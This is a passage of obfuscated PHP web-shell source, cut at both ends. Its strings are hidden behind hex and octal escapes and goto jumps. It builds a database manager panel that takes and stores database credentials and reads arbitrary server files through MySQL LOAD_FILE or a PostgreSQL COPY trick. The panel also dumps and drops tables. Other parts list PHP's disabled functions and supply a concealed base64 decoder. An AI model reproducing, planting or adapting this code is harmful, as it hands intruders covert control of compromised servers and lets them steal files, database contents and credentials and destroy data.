"\x3c\57\164\x65\170\164\141\162\x65\x61\x3e\x3c\x70\76\x3c\143\145\x6e\164\145\x72\x3e\x3c\x69\156\160\x75\164\40\x74\171\x70\145\x3d\x73\165\142\x6d\x69\164\40\x76\141\154\165\145\x3d\47\40\47\x3e\x3c\x2f\x63\145\x6e\x74\145\x72\x3e\74\x2f\160\x3e\74\x2f\x66\x6f\162\x6d\76"; goto U6Y3o; U6Y3o: } goto T_MsO; Mbvju: } goto iA0Xh; CxNJX: if (@$_POST["\141\154\146\x61\61"] == "\x6c\x6f\141\x64\x66\151\154\x65") { $file = $db->loadFile($_POST["\141\x6c\x66\141\62"]); echo "\74\x70\x72\x65\x20\x63\x6c\141\x73\163\x3d\x6d\x6c\61\76" . htmlspecialchars($file["\x66\151\154\145"]) . "\74\57\160\162\145\76"; } goto XsGZI; XsGZI: } else { echo htmlspecialchars($db->error()); } goto xRneE; kVCQ2: if (!isset($_POST["\163\x71\154\137\150\x6f\163\x74"])) { goto Hw03_; nIijv: $_POST["\163\x71\x6c\137\x6c\x6f\147\x69\x6e"] = $_SESSION["\163\161\154\137\154\157\x67\151\156"]; goto LnZKb; LnZKb: $_POST["\x73\x71\x6c\137\160\141\x73\x73"] = $_SESSION["\163\161\154\137\x70\141\163\x73"]; goto k_rmI; Hw03_: $_POST["\x73\161\154\x5f\150\157\x73\x74"] = $_SESSION["\x73\161\154\137\150\x6f\x73\164"]; goto nIijv; k_rmI: $_POST["\163\161\154\x5f\x62\x61\x73\x65"] = $_SESSION["\x73\161\x6c\137\x62\141\163\145"]; goto doiHY; doiHY: } goto ibgbH; sZFW2: echo "\x3c\57\x74\x64\76\15\xa\x3c\164\144\x3e\x3c\151\156\x70\x75\x74\40\x74\171\x70\145\x3d\47\x73\165\x62\155\151\x74\x27\40\x76\x61\x6c\x75\145\75\47\x20\x27\x3e\x3c\x2f\x74\144\76\15\xa\74\x74\x64\76\x3c\151\156\160\165\x74\x20\x74\x79\x70\145\x3d\x27\x63\150\x65\143\x6b\x62\157\170\47\40\x6e\x61\155\x65\x3d\x27\163\x71\154\137\143\x6f\x75\156\x74\x27\x20\166\141\154\x75\x65\75\x27\x6f\156\47" . (empty($_POST["\x73\161\154\137\x63\157\165\x6e\x74"]) ? '' : "\40\143\x68\x65\143\x6b\x65\x64") . "\x3e\40\x3c\144\151\166\x20\143\154\141\163\163\75\42\164\x78\x74\146\157\x6e\x74\42\x3e\x63\x6f\x75\156\164\40\x74\150\x65\40\156\165\x6d\142\x65\162\x20\x6f\x66\x20\162\x6f\x77\x73\x3c\57\x64\x69\x76\76\x3c\x2f\164\144\76\15\xa\x3c\x2f\x74\x72\76\15\xa\x3c\57\x74\x61\x62\x6c\145\76\xd\12\x3c\163\143\162\x69\160\164\x3e\x6d\x79\x73\161\154\137\x63\x61\x63\150\145\x5b\x27\x68\x6f\x73\164\x27\x5d\x3d\x27" . addslashes($_POST["\x73\x71\154\137\x68\x6f\163\164"]) . "\47\73\x6d\171\163\x71\x6c\x5f\143\x61\x63\150\x65\133\x27\165\163\145\162\x27\135\x3d\x27" . addslashes($_POST["\163\161\154\x5f\x6c\157\147\x69\x6e"]) . "\47\73\x6d\171\x73\161\x6c\x5f\143\x61\x63\150\145\133\47\x70\x61\x73\163\x27\x5d\x3d\47" . addslashes($_POST["\x73\x71\x6c\137\x70\x61\163\x73"]) . "\x27\x3b\x6d\171\163\161\154\x5f\143\x61\x63\x68\145\133\x27\144\x62\47\135\x3d\47" . addslashes($_POST["\163\161\x6c\x5f\x62\x61\x73\x65"]) . "\47\73\x6d\x79\x73\161\x6c\137\143\141\x63\x68\145\133\47\x63\150\x61\162\x73\145\x74\x27\135\x3d\x27" . addslashes($_POST["\x63\x68\141\x72\x73\145\x74"]) . "\x27\73\155\x79\163\x71\x6c\x5f\x63\x61\x63\x68\145\x5b\47\164\171\160\x65\x27\x5d\75\x27" . addslashes($_POST["\164\171\160\145"]) . "\x27\x3b\x6d\171\x73\x71\154\x5f\143\x61\143\150\x65\133\47\143\x6f\165\x6e\x74\47\x5d\75\47" . addslashes($_POST["\x73\161\x6c\x5f\x63\157\165\156\164"]) . "\47\74\57\x73\x63\162\151\160\x74\76\xd\xa"; goto cj9Iu; kOepV: if (@$_POST["\164\x79\x70\x65"] == "\x70\x67\x73\x71\x6c") { echo "\x73\145\154\x65\x63\164\145\144"; } goto qqNkY; qqNkY: echo "\76\x50\x6f\163\164\x67\x72\145\123\x71\x6c\74\x2f\157\160\164\x69\x6f\x6e\x3e\74\57\x73\x65\154\x65\x63\x74\76\74\x2f\164\144\x3e\xd\xa\74\164\x64\x3e\x3c\x69\x6e\160\165\164\40\164\x79\x70\x65\x3d\x27\164\145\x78\x74\47\x20\156\141\155\145\x3d\x27\x73\161\154\137\150\157\x73\164\47\x20\x69\144\x3d\47\x64\x62\x5f\150\x6f\163\x74\x27\40\166\141\154\165\145\75\47" . (empty($_POST["\163\161\154\x5f\x68\x6f\x73\x74"]) ? "\x6c\x6f\143\141\154\x68\157\x73\x74" : htmlspecialchars($_POST["\x73\161\154\137\150\157\x73\x74"])) . "\47\76\x3c\x2f\x74\144\76\xd\12\74\x74\x64\76\74\x69\156\x70\165\164\x20\x74\x79\160\145\75\47\164\x65\x78\164\x27\40\x6e\141\155\145\75\x27\x73\161\x6c\137\154\157\x67\x69\x6e\47\x20\x69\x64\x3d\47\x64\x62\137\x75\x73\x65\162\x27\x20\x76\x61\154\165\145\75\47" . (empty($_POST["\163\161\154\x5f\x6c\157\147\151\156"]) ? '' : htmlspecialchars($_POST["\x73\161\x6c\x5f\154\x6f\x67\151\156"])) . "\x27\x3e\x3c\x2f\x74\144\76\15\12\x3c\164\x64\x3e\x3c\151\x6e\160\x75\x74\40\x74\171\x70\145\x3d\x27\x74\145\x78\x74\47\x20\x6e\x61\155\x65\x3d\x27\163\161\x6c\x5f\160\141\x73\x73\47\40\x69\144\75\47\x64\142\x5f\x70\167\x27\40\166\141\x6c\165\x65\x3d\47" . (empty($_POST["\x73\x71\x6c\137\x70\x61\163\x73"]) ? '' : htmlspecialchars($_POST["\x73\x71\154\x5f\x70\x61\x73\163"])) . "\47\76\x3c\x2f\x74\144\76\74\x74\x64\x3e"; goto hGb3_; hGb3_: $tmp = "\x3c\151\156\160\165\164\x20\164\x79\x70\145\x3d\x27\164\145\170\x74\x27\x20\156\141\x6d\145\x3d\x27\x73\161\154\137\142\x61\x73\145\47\x20\x69\x64\x3d\x27\144\x62\137\156\141\x6d\x65\x27\x20\166\141\x6c\x75\145\x3d\47" . (empty($_POST["\x73\161\x6c\137\x62\x61\163\145"]) ? '' : htmlspecialchars($_POST["\x73\161\x6c\137\x62\141\163\x65"])) . "\47\76"; goto q1B1o; rwEfN: echo "\x3e\x4d\x79\123\x71\x6c\x3c\x2f\x6f\160\164\x69\x6f\x6e\76\74\157\160\x74\x69\x6f\x6e\x20\166\x61\x6c\x75\x65\x3d\47\x70\x67\163\x71\x6c\x27\x20"; goto kOepV; DX3Sq: if (@$_POST["\x74\x79\x70\x65"] == "\x6d\171\163\161\x6c") { echo "\163\145\154\x65\x63\x74\x65\144"; } goto rwEfN; eZEx3: $db = new DbClass($_POST["\164\x79\x70\x65"]); goto wsYBd; ajV7s: echo "\15\xa\x3c\x64\x69\x76\x20\x63\154\x61\x73\x73\75\x68\x65\141\x64\x65\162\76\x3c\x63\145\x6e\x74\145\162\76\74\x64\151\166\40\x63\154\x61\163\x73\75\47\164\170\164\146\x6f\156\164\137\x68\x65\141\144\x65\x72\x27\76\174\40\123\x71\x6c\40\115\x61\x6e\141\147\145\162\x20\174\x3c\x2f\x64\151\166\76\x3c\160\x3e" . getConfigHtml("\x61\x6c\154") . "\74\x2f\x70\76\74\57\x63\x65\156\x74\x65\x72\76\xd\xa\74\146\157\x72\155\40\156\141\x6d\145\75\x27\163\146\x27\40\x6d\x65\x74\x68\x6f\144\x3d\x27\160\x6f\163\164\47\x20\157\156\x73\x75\142\x6d\151\x74\75\x27\146\163\x28\164\x68\x69\163\51\73\162\145\x74\x75\x72\156\x20\146\141\154\163\145\x3b\x27\x3e\x3c\164\141\x62\x6c\145\40\x63\145\154\154\x70\x61\x64\144\x69\156\x67\x3d\x27\x32\47\40\143\x65\x6c\x6c\x73\x70\x61\x63\151\156\x67\x3d\x27\60\47\76\x3c\164\x72\76\xd\12\x3c\x74\144\x3e\74\144\151\166\x20\x63\x6c\x61\x73\x73\x3d\42\x74\x78\x74\x66\x6f\x6e\x74\x22\76\124\131\120\x45\74\x2f\x64\x69\x76\x3e\x3c\57\x74\x64\76\x3c\164\x64\x3e\x3c\144\x69\166\x20\x63\x6c\x61\163\x73\x3d\42\x74\170\x74\x66\x6f\156\164\x22\76\x48\x4f\x53\x54\x3c\57\x64\151\166\76\x3c\x2f\164\x64\x3e\x3c\164\144\76\74\144\151\x76\x20\143\x6c\x61\x73\163\75\42\x74\170\x74\146\x6f\156\x74\42\x3e\x44\102\x20\x55\123\105\x52\x3c\57\x64\151\x76\x3e\x3c\57\x74\144\x3e\74\164\144\76\74\x64\x69\166\x20\143\x6c\x61\x73\x73\x3d\x22\x74\x78\164\146\157\156\x74\42\76\104\102\40\x50\101\123\123\x3c\x2f\144\x69\x76\76\x3c\57\164\144\76\x3c\164\144\76\x3c\144\151\166\40\x63\154\x61\163\163\x3d\x22\x74\x78\164\x66\157\x6e\x74\x22\x3e\x44\x42\x20\x4e\x41\x4d\x45\74\57\144\x69\x76\x3e\74\57\x74\x64\76\x3c\x74\144\x3e\74\57\164\144\76\74\57\x74\x72\76\74\164\x72\76\15\xa\74\x69\x6e\x70\165\x74\40\164\171\x70\x65\x3d\x27\150\151\144\144\145\156\47\x20\156\141\155\145\x3d\47\x61\47\x20\x76\x61\x6c\x75\x65\x3d\x53\161\x6c\x3e\x3c\151\156\x70\x75\x74\40\x74\171\160\145\x3d\x27\150\151\x64\x64\x65\x6e\47\x20\x6e\141\155\x65\x3d\47\141\154\x66\x61\61\x27\40\x76\141\x6c\165\x65\x3d\47\161\165\x65\x72\x79\47\x3e\74\151\156\160\165\x74\x20\x74\x79\x70\x65\75\47\150\151\144\144\145\x6e\47\40\x6e\x61\155\x65\75\47\x61\x6c\146\141\62\47\x20\166\141\154\165\x65\75\47\x27\x3e\x3c\151\156\160\x75\164\x20\164\171\x70\145\x3d\x68\x69\x64\x64\145\156\x20\156\x61\x6d\145\75\x63\x20\x76\141\x6c\x75\145\75\x27" . htmlspecialchars($GLOBALS["\143\x77\x64"]) . "\47\x3e\x3c\x69\156\x70\165\164\x20\x74\x79\160\145\75\150\151\x64\x64\145\156\x20\156\141\x6d\145\x3d\x63\x68\x61\162\163\145\x74\40\166\x61\x6c\165\145\x3d\47" . (isset($_POST["\143\150\x61\162\x73\x65\164"]) ? $_POST["\x63\150\x61\x72\163\145\x74"] : "\x55\x54\106\55\x38") . "\x27\x3e\xd\xa\x3c\x74\x64\x3e\74\163\x65\x6c\145\x63\164\40\156\141\x6d\145\75\x27\x74\171\160\x65\47\x3e\74\157\x70\x74\151\157\x6e\40\x76\141\154\x75\x65\75\47\x6d\x79\x73\x71\x6c\x27\40"; goto DX3Sq; ibgbH: class DbClass { public $type; public $link; public $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "\155\x79\x73\x71\x6c": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } break; case "\160\x67\163\x71\154": goto rzKXv; rzKXv: $host = explode("\72", $host); goto usYcZ; usYcZ: if (!$host[1]) { $host[1] = 5432; } goto kBYXY; kBYXY: if ($this->link = @pg_connect("\150\157\x73\164\x3d{$host[0]}\x20\x70\x6f\162\x74\75{$host[1]}\40\165\x73\145\x72\75{$user}\x20\x70\141\x73\x73\167\157\x72\144\75{$pass}\40\x64\x62\x6e\141\155\x65\x3d{$dbname}")) { return true; } goto n3V5k; n3V5k: break; goto at5Ay; at5Ay: } return false; } function selectdb($db) { switch ($this->type) { case "\155\x79\x73\x71\x6c": if (@mysqli_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "\155\171\x73\161\154": return $this->res = @mysqli_query($this->link, $str); break; case "\x70\x67\163\x71\154": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { goto I7ff1; bBufE: switch ($this->type) { case "\x6d\171\163\161\154": return @mysqli_fetch_assoc($res); break; case "\x70\147\x73\161\154": return @pg_fetch_assoc($res); break; } goto t_8ox; t_8ox: return false; goto pqzNO; I7ff1: $res = func_num_args() ? func_get_arg(0) : $this->res; goto bBufE; pqzNO: } function listDbs() { switch ($this->type) { case "\155\171\163\161\154": return $this->query("\123\110\x4f\127\x20\x64\x61\x74\141\142\141\x73\145\163"); break; case "\x70\x67\x73\161\154": return $this->res = $this->query("\123\105\x4c\105\x43\124\40\144\141\x74\156\141\x6d\x65\x20\x46\122\x4f\115\x20\x70\147\137\144\141\164\141\142\x61\x73\x65\40\127\110\105\122\x45\40\144\x61\x74\x69\x73\164\145\155\160\x6c\141\164\145\x21\x3d\x27\164\x27"); break; } return false; } function listTables() { switch ($this->type) { case "\155\171\x73\x71\x6c": return $this->res = $this->query("\x53\110\117\x57\x20\x54\101\x42\114\x45\123"); break; case "\x70\147\x73\x71\154": return $this->res = $this->query("\163\x65\x6c\x65\143\x74\40\x74\x61\x62\x6c\x65\x5f\156\141\155\145\x20\x66\x72\157\155\x20\x69\x6e\146\x6f\162\x6d\141\x74\151\x6f\156\x5f\x73\143\x68\x65\x6d\141\x2e\x74\x61\x62\x6c\145\163\x20\x77\x68\145\162\x65\x20\164\141\142\x6c\x65\x5f\163\143\150\145\155\x61\x20\x21\75\x20\x27\151\x6e\x66\x6f\162\155\x61\x74\151\157\x6e\137\x73\143\x68\x65\155\141\x27\40\x41\x4e\x44\40\x74\x61\142\x6c\145\x5f\163\x63\x68\x65\x6d\x61\x20\x21\75\x20\x27\x70\147\x5f\143\141\164\x61\x6c\157\147\47"); break; } return false; } function error() { switch ($this->type) { case "\x6d\171\x73\161\154": return @mysqli_error($this->link); break; case "\160\147\163\x71\x6c": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "\x6d\x79\163\161\154": if (function_exists("\x6d\171\x73\x71\154\x5f\163\145\x74\x5f\x63\150\141\x72\x73\145\x74")) { return @mysqli_set_charset($this->link, $str); } else { $this->query("\123\105\124\40\x43\110\x41\122\x53\105\124\x20" . $str); } break; case "\160\147\163\x71\154": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "\155\171\x73\x71\x6c": return $this->fetch($this->query("\123\x45\114\105\x43\124\x20\114\x4f\101\104\137\x46\x49\x4c\x45\50\47" . addslashes($str) . "\47\x29\40\x61\x73\x20\146\151\154\145")); break; case "\x70\x67\x73\x71\154": goto QPBNO; QPBNO: $this->query("\x43\x52\105\101\x54\105\x20\x54\x41\102\114\x45\40\x73\157\x6c\x65\166\151\x73\151\142\154\x65\50\146\151\154\145\x20\164\145\170\x74\51\73\103\117\120\131\40\x73\x6f\154\x65\166\151\163\151\x62\x6c\x65\40\x46\x52\x4f\115\40\47" . addslashes($str) . "\47\73\163\x65\154\x65\143\x74\40\x66\151\x6c\145\40\x66\162\x6f\155\x20\x73\x6f\154\145\166\151\x73\x69\x62\154\x65\73"); goto qp215; LdeFM: while ($i = $this->fetch()) { $r[] = $i["\146\151\154\145"]; } goto jTMJG; qp215: $r = array(); goto LdeFM; ga2Vs: break; goto sppKH; xx809: return array("\x66\x69\154\145" => implode("\xa", $r)); goto ga2Vs; jTMJG: $this->query("\x64\162\157\x70\40\164\141\142\154\145\40\163\x6f\x6c\x65\x76\x69\x73\x69\142\x6c\145"); goto xx809; sppKH: } return false; } function dump($table, $fp = false) { switch ($this->type) { case "\155\171\x73\x71\154": goto vIDHe; K9Z2x: $create = mysqli_fetch_array($res); goto ZmAVh; ZsoXL: if (!$head) { if ($fp) { fwrite($fp, "\73\xa\xa"); } else { echo "\x3b\xa\xa"; } } goto x7c0_; IxwxO: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto PfJwp; ZmAVh: $sql = $create[1] . "\73\12"; goto IxwxO; tmhR1: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { if ($v == null) { $item[$k] = "\x27\47"; } elseif (is_numeric($v)) { $item[$k] = $v; } else { $item[$k] = "\x27" . @mysqli_real_escape_string($this->link, $v) . "\47"; } $columns[] = "\140" . $k . "\x60"; } if ($head) { $sql = "\111\x4e\x53\x45\x52\x54\x20\111\x4e\124\x4f\40\x60" . $table . "\x60\40\50" . implode("\x2c\x20", $columns) . "\x29\x20\126\101\x4c\125\105\123\x20\12\11\50" . implode("\54\40", $item) . "\x29"; $head = false; } else { $sql = "\12\x9\x2c\x28" . implode("\x2c\x20", $item) . "\x29"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto ZsoXL; vIDHe: $res = $this->query("\123\110\x4f\x57\40\103\122\105\x41\x54\105\40\x54\101\102\114\x45\x20\x60" . $table . "\140"); goto K9Z2x; x7c0_: break; goto T6_xn; U7vZo: $head = true; goto tmhR1; PfJwp: $this->query("\123\x45\x4c\x45\103\x54\40\52\40\106\x52\117\x4d\40\140" . $table . "\x60"); goto U7vZo; T6_xn: case "\x70\147\x73\161\154": goto FReEM; FReEM: $this->query("\x53\x45\x4c\105\x43\x54\40\52\x20\x46\x52\x4f\x4d\40" . $table); goto l4ow2; Zus86: break; goto gZndG; l4ow2: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "\x27" . addslashes($v) . "\x27"; $columns[] = $k; } $sql = "\x49\x4e\123\105\x52\x54\40\x49\116\x54\117\x20" . $table . "\x20\50" . implode("\x2c\x20", $columns) . "\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28" . implode("\x2c\x20", $item) . "\x29\73" . "\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto Zus86; gZndG: } return false; } } goto eZEx3; wsYBd: if (@$_POST["\141\154\146\141\61"] == "\x64\x75\155\160\146\151\154\x65" || @$_POST["\x61\154\146\x61\x31"] == "\144\x72\157\x70\164\142\x6c") { goto VDJaX; VDJaX: $db->connect($_POST["\163\161\x6c\x5f\x68\157\x73\164"], $_POST["\x73\161\154\137\x6c\157\147\x69\x6e"], $_POST["\x73\161\x6c\137\160\x61\x73\x73"], $_POST["\x73\x71\x6c\x5f\142\141\163\x65"]); goto l5EPL; Eqm4s: switch ($_POST["\143\150\141\x72\x73\x65\164"]) { case "\x57\151\156\x64\157\167\x73\55\61\62\65\x31": $db->setCharset("\143\x61\x6c\146\x61\x31\x32\x35\x31"); break; case "\x55\124\x46\55\70": $db->setCharset("\x75\164\146\x38"); break; case "\113\x4f\111\70\x2d\122": $db->setCharset("\153\x6f\151\70\x72"); break; case "\x4b\117\111\x38\55\125": $db->setCharset("\x6b\x6f\151\70\165"); break; case "\x63\141\x6c\x66\x61\70\66\x36": $db->setCharset("\x63\x61\154\146\141\x38\x36\66"); break; } goto XLket; S5lTc: if (count($json["\x74\142\x6c"]) > 0) { if ($_POST["\141\154\x66\x61\x31"] == "\144\x75\155\160\146\151\x6c\x65") { if ($fp = @fopen($json["\146\151\x6c\x65"], "\167")) { goto E0SGe; E0SGe: foreach ($json["\164\x62\154"] as $v) { $db->dump($v, $fp); } goto ONP0a; EIbNG: $dumpStatus = true; goto vcDt3; ONP0a: fclose($fp); goto EIbNG; vcDt3: } } else { foreach ($json["\164\142\154"] as $v) { $db->query("\104\x52\x4f\x50\40\124\101\102\114\105\x20" . $v); } } } goto J0X8p; J0X8p: unset($_POST["\x61\x6c\146\141\x32"]); goto qy1uM; l5EPL: $db->selectdb($_POST["\x73\161\154\x5f\x62\x61\x73\145"]); goto Eqm4s; XLket: $json = json_decode($_POST["\x61\x6c\146\141\x32"], true); goto S5lTc; qy1uM: } goto i2Hyq; i2Hyq: alfahead(); goto ajV7s; q1B1o: if (isset($_POST["\x73\x71\x6c\x5f\150\x6f\163\x74"])) { if ($db->connect($_POST["\x73\x71\154\137\150\x6f\163\x74"], $_POST["\x73\161\154\x5f\154\x6f\147\x69\156"], $_POST["\x73\x71\154\137\160\x61\x73\163"], $_POST["\x73\161\154\x5f\x62\141\163\145"])) { goto zxtk4; a2Yo0: echo "\x3c\x2f\163\145\154\145\143\x74\76"; goto AU4LG; StFXx: while ($item = $db->fetch()) { list($key, $value) = each($item); echo "\x3c\x6f\x70\164\x69\157\x6e\x20\x76\141\154\165\145\x3d\42" . $value . "\42\40" . ($value == $_POST["\163\161\154\x5f\142\x61\163\145"] ? "\x73\145\x6c\145\x63\164\145\144" : '') . "\76" . $value . "\74\x2f\x6f\160\164\151\x6f\x6e\x3e"; } goto a2Yo0; FAMts: $db->listDbs(); goto Z62ai; u3zVq: switch ($_POST["\143\150\141\162\x73\x65\164"]) { case "\x57\151\156\x64\x6f\x77\x73\x2d\61\x32\65\x31": $db->setCharset("\143\141\154\146\141\61\x32\65\61"); break; case "\125\124\x46\55\70": $db->setCharset("\x75\x74\x66\x38"); break; case "\113\117\x49\x38\x2d\x52": $db->setCharset("\153\x6f\151\70\162"); break; case "\x4b\x4f\111\x38\55\x55": $db->setCharset("\153\x6f\x69\x38\x75"); break; case "\143\x61\154\x66\141\x38\x36\66": $db->setCharset("\x63\141\154\x66\141\x38\x36\66"); break; } goto koZic; Gqo1e: $_SESSION["\x73\x71\154\x5f\142\141\163\145"] = $_POST["\x73\x71\154\x5f\142\141\163\145"]; goto u3zVq; Z62ai: echo "\x3c\163\145\x6c\145\143\x74\x20\x6e\141\155\145\75\x73\x71\x6c\137\142\x61\163\x65\x3e\x3c\x6f\x70\164\x69\157\x6e\40\166\141\x6c\x75\x65\75\x27\47\x3e\74\57\157\160\x74\151\x6f\x6e\76"; goto StFXx; quFKT: $_SESSION["\163\161\154\x5f\x70\x61\163\163"] = $_POST["\x73\x71\x6c\x5f\160\x61\163\163"]; goto Gqo1e; CEkeO: $_SESSION["\163\161\x6c\137\x6c\157\147\151\x6e"] = $_POST["\163\161\154\137\x6c\157\x67\x69\156"]; goto quFKT; zxtk4: $_SESSION["\x73\x71\x6c\137\x68\x6f\x73\x74"] = $_POST["\163\x71\154\x5f\x68\x6f\163\x74"]; goto CEkeO; koZic: $db->setCharset("\x75\x74\x66\70"); goto FAMts; AU4LG: } else { echo $tmp; } } else { echo $tmp; } goto sZFW2; xRneE: echo "\x3c\57\x64\151\166\76"; goto k8toS; k8toS: alfafooter(); goto ZYaZO; ZYaZO: } goto ib3Lc; PHDKT: if (strtolower(substr(PHP_OS, 0, 3)) == "\x77\x69\156") { $GLOBALS["\x73\x79\x73"] = "\x77\151\x6e"; } else { $GLOBALS["\x73\171\x73"] = "\x75\x6e\x69\x78"; } goto i967k; kB8SH: if (!isset($GLOBALS["\x44\102\x5f\x4e\x41\115\x45"]["\x73\x68\x6f\x77\137\151\143\x6f\156\163"])) { exit("\44\107\x4c\117\102\101\x4c\x53\133\47\104\x42\137\x4e\x41\x4d\105\x27\x5d\x5b\x27\x73\x68\157\x77\x5f\151\x63\x6f\x6e\163\47\x5d"); } goto DjH8C; ZNx0t: if (!$XDmfxOnhck("\142" . "\141\163\145" . "\x36" . "\64\137\144\145\x63\x6f" . "\144" . "\145")) { function QFdAWqZnUX($input) { goto d7TPS; yd4Sp: $input = preg_replace("\x5b\x5e\x41\55\x5a\141\55\x7a\60\x2d\71\134\x2b\x5c\57\x5c\75\x5d", '', $input); goto rBHxp; goC7_: return $output; goto SbuIp; p0IrD: $i = 0; goto T96o7; T96o7: $output = ''; goto yd4Sp; d7TPS: if (empty($input)) { return; } goto UGog2; rBHxp: do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = $enc1 << 2 | $enc2 >> 4; $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2; $chr3 = ($enc3 & 3) << 6 | $enc4; $output = $output . chr((int) $chr1); if ($enc3 != 64) { $output = $output . chr((int) $chr2); } if ($enc4 != 64) { $output = $output . chr((int) $chr3); } $chr1 = $chr2 = $chr3 = ''; $enc1 = $enc2 = $enc3 = $enc4 = ''; } while ($i < strlen($input)); goto goC7_; UGog2: $keyStr = "\x41\102\x43\104\105\106\x47\110\111\112\x4b\x4c\x4d\x4e\117\x50\x51\122\123\124\x55\x56\127\130\x59\x5a\141\142\143\144\x65\x66\x67\150\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\161\x72\x73\x74\x75\166\167\x78\x79\x7a\60\x31\62\x33\x34\x35\66\x37\70\x39\53\x2f\x3d"; goto Kp4YY; D4l1m: $enc1 = $enc2 = $enc3 = $enc4 = ''; goto p0IrD; Kp4YY: $chr1 = $chr2 = $chr3 = ''; goto D4l1m; SbuIp: } } else { function QFdAWqZnUX($s) { $b = "\x62" . "\x61\163\145" . "\x36" . "\x34\137\x64\x65\x63\x6f" . "\144" . "\145"; return $b($s); } } goto NsqqZ; tNC7F: function alfaGetDisFunc() { goto CT7VK; CT7VK: alfahead(); goto w6gsh; UCzWI: foreach ($f as $s) { goto awOzk; sIE2k: if (function_exists($s) || !is_callable($s)) { continue; } goto fTszn; bSg6k: $i++; goto MWQ_Z; awOzk: $s = trim($s); goto sIE2k; v_bLj: echo "\74\164\x64\40\141\154\x69\x67\x6e\x3d\x22\x63\x65\x6e\x74\145\x72\42\40\x73\164\171\154\x65\x3d\x22\142\141\143\x6b\147\162\x6f\x75\x6e\144\x2d\x63\157\154\157\x72\x3a\40\142\x6c\x61\143\x6b\73\x22\76\74\141\40\x73\x74\x79\154\145\x3d\x22\164\x65\170\164\55\144\145\x63\157\162\141\164\151\x6f\x6e\x3a\40\x6e\157\x6e\x65\73\42\40\x74\141\162\x67\x65\x74\75\x22\137\142\154\141\156\x6b\x22\40\150\162\x65\146\75\x22\150\164\164\x70\72\x2f\x2f\x70\150\x70\x2e\156\x65\x74\57\x6d\x61\x6e\165\141\x6c\x2f\x65\156\x2f\x66\x75\x6e\143\x74\x69\x6f\156\x2e" . str_replace("\137", "\55", $s) . "\56\160\x68\x70\x22\x3e\x3c\x73\160\141\x6e\40\143\x6c\141\x73\x73\75\x22\x64\x69\163\141\x62\154\145\x5f\x66\165\156\143\164\x69\157\156\x73\x22\x3e\74\x62\x3e" . $s . "\x3c\x2f\142\76\74\57\x73\160\x61\x6e\x3e\74\57\141\x3e\x3c\57\164\x64\76"; goto bSg6k; fTszn: echo "\74\x74\x72\76\74\x74\x64\x20\141\154\151\147\156\x3d\x22\143\145\156\164\145\162\42\40\163\164\x79\154\145\x3d\x22\142\141\x63\153\x67\162\x6f\x75\156\144\55\x63\x6f\154\157\x72\72\x20\142\154\x61\143\153\73\42\76" . $i . "\x3c\x2f\x74\x64\x3e"; goto v_bLj; MWQ_Z: } goto ejxha; Iej_C: $s = explode("\54", $disfun); goto Q22be; j9DGA: $disfun = @ini_get("\144\x69\163\141\142\154\145\x5f\x66\x75\x6e\x63\x74\x69\x6f\156\x73"); goto Iej_C; Ewcnw: echo "\74\x2f\144\151\x76\76"; goto xvapa; xvapa: alfafooter(); goto BNjrY; PbWM7: $i = 1; goto UCzWI; SgrY5: echo "\74\143\x65\156\x74\x65\x72\76\74\142\162\76\74\x62\x3e\74\x66\x6f\156\164\x20\x63\x6f\154\x6f\x72\75\x22\x23\x37\103\106\103\60\60\42\76\104\x69\x73\141\142\154\x65\40\106\x75\x6e\x63\164\151\157\x6e\163\74\57\146\157\x6e\164\76\x3c\x2f\x62\76\74\x70\x72\145\76\x3c\164\141\142\154\145\x20\x62\157\162\x64\145\x72\75\42\61\42\x3e\x3c\x74\x72\76\74\164\x64\40\x61\154\x69\147\156\x3d\x22\x63\x65\x6e\x74\x65\162\42\40\x73\x74\171\x6c\x65\75\x22\142\x61\x63\x6b\147\x72\x6f\x75\x6e\x64\x2d\x63\x6f\154\x6f\x72\x3a\40\x67\x72\x65\x65\156\x3b\143\157\154\157\162\72\40\167\x68\151\x74\145\x3b\x77\151\x64\x74\x68\72\65\x25\x22\x3e\43\74\57\x74\144\76\74\164\x64\40\x61\154\151\x67\156\x3d\42\143\x65\x6e\164\x65\162\x22\x20\163\x74\171\x6c\145\x3d\x22\142\141\143\153\x67\162\x6f\165\x6e\144\x2d\143\157\x6c\x6f\x72\x3a\40\x67\162\x65\145\156\73\x63\x6f\x6c\x6f\162\x3a\40\x77\150\151\x74\145\x3b\x22\x3e\x46\x75\156\x63\x20\116\x61\x6d\x65\x3c\x2f\x74\144\x3e\74\x2f\164\162\x3e"; goto PbWM7; Q22be: $f = array_unique($s); goto SgrY5; w6gsh: echo "\x3c\x64\x69\x76\x20\143\154\141\x73\163\75\42\x68\x65\x61\x64\145\x72\42\x3e"; goto j9DGA; ejxha: echo "\x3c\57\x74\x61\142\154\x65\x3e\x3c\57\x63\145\x6e\164\x65\162\76"; goto Ewcnw; BNjrY: } goto SlYwg; DfS0Z: define("\x5f\x5f\x4c\101\123\x54\137\x43\127\x44\137\x5f", "\x6c\x61\x73\x74\137\143\x77\x64\137" . __ALFA_MD5NAME__); goto vyOkU; tsIKa: $GLOBALS["\104\x42\x5f\x4e\101\x4d\105"] = $GLOBALS["\116\145\x55\123\115\x79\120\x47\x58\120"]; goto D1CXD; AZtgr: function alfaziper() { goto n3mFU; n3mFU: alfahead(); goto RoJsV; cFWCP: if (isset($_POST["\141\154\x66\141\65"]) && $_POST["\x61\x6c\x66\x61\x35"] == "\x3e\x3e") { goto TRvIy; LE9Vg: $zipfile = $_POST["\141\154\146\141\x34"]; 